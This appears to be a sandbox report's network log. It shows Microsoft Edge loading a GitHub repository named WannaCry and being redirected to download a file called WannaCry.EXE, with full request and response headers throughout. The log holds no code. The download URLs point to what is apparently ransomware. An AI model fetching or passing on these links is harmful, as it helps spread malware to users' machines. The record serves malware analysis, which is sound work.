cookie: _gh_sess=xj%2Bwld8nf8z9by3Q%2FwR9LEJtypAijOIBYpef1SyhQYOqxhbfQaOPxLhNePDGM%2FPVAOFa%2FOkURddQBaLeL8PWKAGDYdcfgXfJId7xUhROu4ykpgGi098wIsCE9q%2BpPnT2mH6ej3CrQHSHY1xtH2DTzJaCMWvm6VosMfWozUCfVelM8k%2Byz4yevkk%2FH%2FjLedfMsZrtCaX8t%2BmvY2w1WEtGbEOR%2BqMwFGwfUihVJsFJirmzcQhpp1h1YuU3tIawwE6F6g6ZxZLnvUq%2F6GYZwWaB0A%3D%3D--bNPBQnM1h35VXbC2--69%2F3lJfJUedMLvNuAhy9VQ%3D%3D
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Thu, 17 Oct 2024 21:04:14 GMT
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: max-age=604800, public
etag: W/"c75e05794d72230a695e880f1a6c83a4"
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-type: application/manifest+json; charset=utf-8
content-encoding: gzip
accept-ranges: bytes
content-length: 474
x-github-request-id: C454:298401:186D79:1B6EDC:67117BD8
GET

https://github.com/limiteci/WannaCry/branch-and-tag-count

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /limiteci/WannaCry/branch-and-tag-count HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=xj%2Bwld8nf8z9by3Q%2FwR9LEJtypAijOIBYpef1SyhQYOqxhbfQaOPxLhNePDGM%2FPVAOFa%2FOkURddQBaLeL8PWKAGDYdcfgXfJId7xUhROu4ykpgGi098wIsCE9q%2BpPnT2mH6ej3CrQHSHY1xtH2DTzJaCMWvm6VosMfWozUCfVelM8k%2Byz4yevkk%2FH%2FjLedfMsZrtCaX8t%2BmvY2w1WEtGbEOR%2BqMwFGwfUihVJsFJirmzcQhpp1h1YuU3tIawwE6F6g6ZxZLnvUq%2F6GYZwWaB0A%3D%3D--bNPBQnM1h35VXbC2--69%2F3lJfJUedMLvNuAhy9VQ%3D%3D
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Thu, 17 Oct 2024 21:04:24 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"c9fdf82d48cf65e9e50d2308ceb45de7"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 429
x-github-request-id: C454:298401:186D5F:1B6ECA:67117BD7
GET

https://github.com/manifest.json

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /manifest.json HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=xj%2Bwld8nf8z9by3Q%2FwR9LEJtypAijOIBYpef1SyhQYOqxhbfQaOPxLhNePDGM%2FPVAOFa%2FOkURddQBaLeL8PWKAGDYdcfgXfJId7xUhROu4ykpgGi098wIsCE9q%2BpPnT2mH6ej3CrQHSHY1xtH2DTzJaCMWvm6VosMfWozUCfVelM8k%2Byz4yevkk%2FH%2FjLedfMsZrtCaX8t%2BmvY2w1WEtGbEOR%2BqMwFGwfUihVJsFJirmzcQhpp1h1YuU3tIawwE6F6g6ZxZLnvUq%2F6GYZwWaB0A%3D%3D--bNPBQnM1h35VXbC2--69%2F3lJfJUedMLvNuAhy9VQ%3D%3D
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Thu, 17 Oct 2024 21:04:24 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"bc391bfedfcf1ab5d1f1a0340bc001e6"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 472
x-github-request-id: C454:298401:186D5F:1B6ECC:67117BD7
GET

https://github.com/limiteci/WannaCry/funding_links?fragment=1

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /limiteci/WannaCry/funding_links?fragment=1 HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
accept: text/html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=xj%2Bwld8nf8z9by3Q%2FwR9LEJtypAijOIBYpef1SyhQYOqxhbfQaOPxLhNePDGM%2FPVAOFa%2FOkURddQBaLeL8PWKAGDYdcfgXfJId7xUhROu4ykpgGi098wIsCE9q%2BpPnT2mH6ej3CrQHSHY1xtH2DTzJaCMWvm6VosMfWozUCfVelM8k%2Byz4yevkk%2FH%2FjLedfMsZrtCaX8t%2BmvY2w1WEtGbEOR%2BqMwFGwfUihVJsFJirmzcQhpp1h1YuU3tIawwE6F6g6ZxZLnvUq%2F6GYZwWaB0A%3D%3D--bNPBQnM1h35VXbC2--69%2F3lJfJUedMLvNuAhy9VQ%3D%3D
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Thu, 17 Oct 2024 21:04:24 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"9d8a34137a9f39222d04bf762c4aa637"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
x-html-safe: 269915f5358aad939bb8e8b6eaca3df5464a42e9a89c842273a019331490dd05
accept-ranges: bytes
content-length: 1385
x-github-request-id: C454:298401:186D7E:1B6EE2:67117BD8
GET

https://github.com/limiteci/WannaCry/blob/main/WannaCry.EXE?raw=true

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /limiteci/WannaCry/blob/main/WannaCry.EXE?raw=true HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
accept: text/html, application/xhtml+xml
dnt: 1
turbo-visit: true
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry?tab=readme-ov-file
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=xj%2Bwld8nf8z9by3Q%2FwR9LEJtypAijOIBYpef1SyhQYOqxhbfQaOPxLhNePDGM%2FPVAOFa%2FOkURddQBaLeL8PWKAGDYdcfgXfJId7xUhROu4ykpgGi098wIsCE9q%2BpPnT2mH6ej3CrQHSHY1xtH2DTzJaCMWvm6VosMfWozUCfVelM8k%2Byz4yevkk%2FH%2FjLedfMsZrtCaX8t%2BmvY2w1WEtGbEOR%2BqMwFGwfUihVJsFJirmzcQhpp1h1YuU3tIawwE6F6g6ZxZLnvUq%2F6GYZwWaB0A%3D%3D--bNPBQnM1h35VXbC2--69%2F3lJfJUedMLvNuAhy9VQ%3D%3D
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 302

server: GitHub.com
date: Thu, 17 Oct 2024 21:04:44 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
location: https://github.com/limiteci/WannaCry/raw/refs/heads/main/WannaCry.EXE
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-length: 0
x-github-request-id: C454:298401:187532:1B77BA:67117BD8
GET

https://github.com/limiteci/WannaCry/raw/refs/heads/main/WannaCry.EXE

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /limiteci/WannaCry/raw/refs/heads/main/WannaCry.EXE HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
accept: text/html, application/xhtml+xml
dnt: 1
turbo-visit: true
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/limiteci/WannaCry?tab=readme-ov-file
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=xj%2Bwld8nf8z9by3Q%2FwR9LEJtypAijOIBYpef1SyhQYOqxhbfQaOPxLhNePDGM%2FPVAOFa%2FOkURddQBaLeL8PWKAGDYdcfgXfJId7xUhROu4ykpgGi098wIsCE9q%2BpPnT2mH6ej3CrQHSHY1xtH2DTzJaCMWvm6VosMfWozUCfVelM8k%2Byz4yevkk%2FH%2FjLedfMsZrtCaX8t%2BmvY2w1WEtGbEOR%2BqMwFGwfUihVJsFJirmzcQhpp1h1YuU3tIawwE6F6g6ZxZLnvUq%2F6GYZwWaB0A%3D%3D--bNPBQnM1h35VXbC2--69%2F3lJfJUedMLvNuAhy9VQ%3D%3D
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 302

server: GitHub.com
date: Thu, 17 Oct 2024 21:04:44 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/limiteci/WannaCry/refs/heads/main/WannaCry.EXE
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-length: 0
x-github-request-id: C454:298401:187542:1B77CC:67117BEC
GET

https://github.com/limiteci/WannaCry/blob/main/WannaCry.EXE?raw=true

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /limiteci/WannaCry/blob/main/WannaCry.EXE?raw=true HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
referer: https://github.com/limiteci/WannaCry?tab=readme-ov-file
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
